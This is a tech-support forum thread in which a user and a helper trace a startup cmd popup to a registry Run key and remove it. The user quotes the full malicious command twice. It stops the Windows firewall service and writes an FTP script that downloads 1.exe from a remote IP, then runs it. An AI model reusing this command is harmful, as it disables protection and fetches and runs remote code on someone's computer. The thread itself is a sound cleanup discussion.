Solved Internet Connection Sharing cmd window pops up at startup

[Wdingdong]

~~~
Did someone hack my PC?
~~~

I see from the file that you attached that you have Norton Antivirus. Which Norton product do you have?

Do you have more than one antivirus tool installed?

Has ESET6 ever been installed on this computer? It can make user profiles with random names. I am not talking about ESET's online scanner.

Hopefully Kaktussoft will stop by soon to help you with the file you attached.

No, I never installed ESET6. I have two Norton products installed, Norton Internet Security and Norton Utilities.

I've attached the PCTProcess.txt and cmd.txt.

Logoff on logon again. cmd popup appears? If so disable Norton Utilities 16. logoff and logon again. cmd popup appears?

I was checking with each startup programs and services, and I found that Norton Utilities doesn't cause the cmd popup but some other file does. Here, is the screenshot:

I found that the one I've checked causes the cmd popup.

 

[Kaktussoft]

The system configuration screenshot list "cmd.exe /c net..." make that column larger please so I can see whole command.

Scan registry (using regedit) for string "cmd.exe /c net" and post screenshot if found. The location is shown in your screenshot as well. Most likely it's in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

 

[Wdingdong]

The command column was too long so I'm copy-pasting it here directly:
"c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 116.255.163.41 > cmd.text&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get1.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1.exe&1.exe&del cmd.txt /q /f&ex"

Also here is a screenshot of registry:

 

[Kaktussoft]

delete cmd.txt
delete that key from registry

 

[Wdingdong]

Which key? And what about the PCTProcess.txt?
So, why did Microsoft program do this?

 

[Kaktussoft]

Which key? And what about the PCTProcess.txt?
So, why did Microsoft program do this?

PCTProcess.txt is just a logfile of startup items.

Scan registry for 116.255.163.41 and post screenshot when found

 

[Wdingdong]

The registry didn't show up anything. Anyway, the problem is solved as there is no longer the cmd popup.
Big thanks to you Kaktussoft. Thanks to everyone.

 

[Kaktussoft]

The command column was too long so I'm copy-pasting it here directly:
"c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open 116.255.163.41 > cmd.text&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get1.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1.exe&1.exe&del cmd.txt /q /f&ex"

Where did you find that string?

 

[Wdingdong]

It is the string from the column of which you wanted an expanded screenshot, the Microsoft startup program from msconfig.

 

[Kaktussoft]

It is the string from the column of which you wanted an expanded screenshot, the Microsoft startup program from msconfig.

That line is in registry as well. Delete that key.